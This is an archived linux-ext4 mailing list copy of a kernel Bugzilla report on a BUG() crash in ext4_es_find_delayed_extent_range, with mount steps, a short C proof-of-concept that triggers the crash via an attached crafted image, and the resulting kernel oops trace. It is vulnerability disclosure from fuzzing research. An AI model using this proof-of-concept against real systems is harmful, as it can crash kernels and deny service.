lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <bug-200623-13602@https.bugzilla.kernel.org/>
Date:   Sun, 22 Jul 2018 19:50:46 +0000
From:   bugzilla-daemon@...zilla.kernel.org
To:     linux-ext4@...nel.org
Subject: [Bug 200623] New: BUG() in ext4_es_find_delayed_extent_range() when
 operating a corrupted image

https://bugzilla.kernel.org/show_bug.cgi?id=200623

            Bug ID: 200623
           Summary: BUG() in ext4_es_find_delayed_extent_range() when
                    operating a corrupted image
           Product: File System
           Version: 2.5
    Kernel Version: 4.18
          Hardware: All
                OS: Linux
              Tree: Mainline
            Status: NEW
          Severity: normal
          Priority: P1
         Component: ext4
          Assignee: fs_ext4@...nel-bugs.osdl.org
          Reporter: wen.xu@...ech.edu
        Regression: No

Created attachment 277465
  --> https://bugzilla.kernel.org/attachment.cgi?id=277465&action=edit
The (compressed) crafted image which causes crash

- Reproduce
# mkdir mnt
# mount -t ext4 15.img mnt
# gcc -o poc poc.c
# ./poc ./mnt

- POC (poc.c)
#include <sys/types.h>
#include <sys/mount.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/xattr.h>
#include <sys/syscall.h>

#include <dirent.h>
#include <errno.h>
#include <error.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

int main(int argc, char *argv[])
{
        unsigned char v0[8192];
        unsigned char v1[8192];
        char v2[] = ".";
        char v3[] = "lost+found";
        char v4[] = "foo";
        char v5[] = "foo/bar";
        char v6[] = "foo/bar/hln";
        char v7[] = "foo/bar/æøå";
        char v8[] = "foo/bar/baz";
        char v9[] = "foo/bar/sln";
        char v10[] = "foo/bar/acl";
        char v11[] = "foo/bar/fifo";
        char v12[] = "foo/bar/xattr";
        long v13;

        chdir(argv[1]);
        v13 = syscall(SYS_open, (long)v7, 2, 0);
        syscall(SYS_read, (long)v13, (long)v0, 7424);
        syscall(SYS_pwrite64, (long)v13, (long)v1, 441, 6842);
        syscall(SYS_lseek, (long)v13, 3474, 3);

        close(v13);
        return 0;
}

= Kernel message
[13983.726442] EXT4-fs: Warning: mounting with data=journal disables delayed
allocation and O_DIRECT support!
[13983.783120] EXT4-fs (loop0): mounted filesystem with journalled data mode.
Opts: (null)
[14000.138283] EXT4-fs error (device loop0): ext4_mb_generate_buddy:746: group
0, block bitmap and bg descriptor inconsistent: 7011 vs 7022 free clusters
[14000.141268] EXT4-fs error (device loop0): ext4_mb_generate_buddy:746: group
1, block bitmap and bg descriptor inconsistent: 7037 vs 7038 free clusters
[14000.144276] ------------[ cut here ]------------
[14000.144284] kernel BUG at fs/ext4/extents_status.c:253!
[14000.145732] invalid opcode: 0000 [#1] SMP KASAN PTI
[14000.146787] CPU: 0 PID: 1576 Comm: a.out Not tainted 4.18.0-rc4+ #1
[14000.148076] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS
Ubuntu-1.8.2-1ubuntu1 04/01/2014
[14000.150039] RIP: 0010:ext4_es_find_delayed_extent_range+0x2cb/0x2d0
[14000.151300] Code: 48 89 de e8 17 2a f2 00 4c 89 ef e8 ff d0 eb ff 4d 8b 75
00 4d 85 f6 75 d3 48 83 c4 10 5b 41 5c 41 5d 41 5e 41 5f 5d c3 0f 0b <0f> 0b 0f
1f 00 66 66 66 66 90 55 48 89 e5 41 57 41 56 41 89 d6 48
[14000.155067] RSP: 0018:ffff8801db3c7bf8 EFLAGS: 00010297
[14000.156124] RAX: 0000000000000000 RBX: ffff8801ebfeb478 RCX:
ffff8801db3c7ce8
[14000.157555] RDX: 0000000000001900 RSI: 0000000000001901 RDI:
ffff8801ebfeb478
[14000.158975] RBP: ffff8801db3c7d70 R08: ffff8801db3c7878 R09:
ffffed003d7fd6e3
[14000.160396] R10: 0000000000010000 R11: ffffed003d7fd6e2 R12:
0000000000000000
[14000.161826] R13: ffff8801db3c7dc8 R14: ffff8801db3c7d48 R15:
0000000000001900
[14000.163237] FS:  00007fcccc2fb700(0000) GS:ffff8801f7200000(0000)
knlGS:0000000000000000
[14000.164835] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[14000.169757] CR2: 00007ffc2ca331a0 CR3: 00000001ee168000 CR4:
00000000000006f0
[14000.171222] Call Trace:
[14000.171753]  ? ext4_iomap_begin+0x641/0x7a0
[14000.172616]  ? ext4_dio_get_block+0x80/0x80
[14000.173488]  ? ext4_file_read_iter+0xa0/0x170
[14000.174398]  ? __vfs_read+0x2a6/0x400
[14000.175152]  ? __vfs_write+0x286/0x410
[14000.175923]  ? kernel_read+0xa0/0xa0
[14000.176661]  iomap_apply+0xd7/0x200
[14000.177392]  ? iomap_seek_hole_actor+0x80/0x80
[14000.178302]  ? iomap_dirty_actor+0x310/0x310
[14000.179174]  iomap_seek_data+0x7c/0xb0
[14000.179942]  ? iomap_seek_hole_actor+0x80/0x80
[14000.180847]  ext4_llseek+0x123/0x160
[14000.181599]  ksys_lseek+0x9e/0xd0
[14000.182282]  __x64_sys_lseek+0x43/0x50
[14000.183053]  do_syscall_64+0x78/0x170
[14000.183816]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[14000.184854] RIP: 0033:0x7fcccbe174d9
[14000.185599] Code: 00 f3 c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 40 00 48 89
f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01
f0 ff ff 73 01 c3 48 8b 0d 8f 29 2c 00 f7 d8 64 89 01 48
[14000.189398] RSP: 002b:00007ffc2ca310c8 EFLAGS: 00000286 ORIG_RAX:
0000000000000008
[14000.190913] RAX: ffffffffffffffda RBX: 0000000000000000 RCX:
00007fcccbe174d9
[14000.192341] RDX: 0000000000000003 RSI: 0000000000000d92 RDI:
0000000000000003
[14000.193782] RBP: 00007ffc2ca351b0 R08: 00007ffc2ca35298 R09:
00007ffc2ca35298
[14000.195216] R10: 00007ffc2ca35298 R11: 0000000000000286 R12:
0000000000400530
[14000.196652] R13: 00007ffc2ca35290 R14: 0000000000000000 R15:
0000000000000000
[14000.198107] Modules linked in: snd_hda_codec_generic snd_hda_intel
snd_hda_codec snd_hwdep snd_hda_core snd_pcm snd_timer snd soundcore mac_hid
i2c_piix4 ib_iser rdma_cm iw_cm ib_cm ib_core iscsi_tcp libiscsi_tcp libiscsi
scsi_transport_iscsi autofs4 btrfs zstd_decompress zstd_compress xxhash raid10
raid456 async_raid6_recov async_memcpy async_pq async_xor async_tx xor raid6_pq
raid1 raid0 multipath linear 8139too qxl drm_kms_helper crct10dif_pclmul
syscopyarea crc32_pclmul sysfillrect sysimgblt fb_sys_fops ttm drm aesni_intel
aes_x86_64 crypto_simd cryptd glue_helper 8139cp mii pata_acpi floppy
[14000.209140] ---[ end trace 56aa4821a2231d02 ]---
[14000.210125] RIP: 0010:ext4_es_find_delayed_extent_range+0x2cb/0x2d0
[14000.211577] Code: 48 89 de e8 17 2a f2 00 4c 89 ef e8 ff d0 eb ff 4d 8b 75
00 4d 85 f6 75 d3 48 83 c4 10 5b 41 5c 41 5d 41 5e 41 5f 5d c3 0f 0b <0f> 0b 0f
1f 00 66 66 66 66 90 55 48 89 e5 41 57 41 56 41 89 d6 48
[14000.215601] RSP: 0018:ffff8801db3c7bf8 EFLAGS: 00010297
[14000.216700] RAX: 0000000000000000 RBX: ffff8801ebfeb478 RCX:
ffff8801db3c7ce8
[14000.218162] RDX: 0000000000001900 RSI: 0000000000001901 RDI:
ffff8801ebfeb478
[14000.219648] RBP: ffff8801db3c7d70 R08: ffff8801db3c7878 R09:
ffffed003d7fd6e3
[14000.221112] R10: 0000000000010000 R11: ffffed003d7fd6e2 R12:
0000000000000000
[14000.222560] R13: ffff8801db3c7dc8 R14: ffff8801db3c7d48 R15:
0000000000001900
[14000.224047] FS:  00007fcccc2fb700(0000) GS:ffff8801f7200000(0000)
knlGS:0000000000000000
[14000.225707] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[14000.226874] CR2: 00007ffc2ca331a0 CR3: 00000001ee168000 CR4:
00000000000006f0

- Location
https://elixir.bootlin.com/linux/v4.18-rc5/source/fs/ext4/extents_status.c#L252

Reported by Wen Xu (wen.xu@...ech.edu) from SSLab at Gatech.

-- 
You are receiving this mail because:
You are watching the assignee of the bug.

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ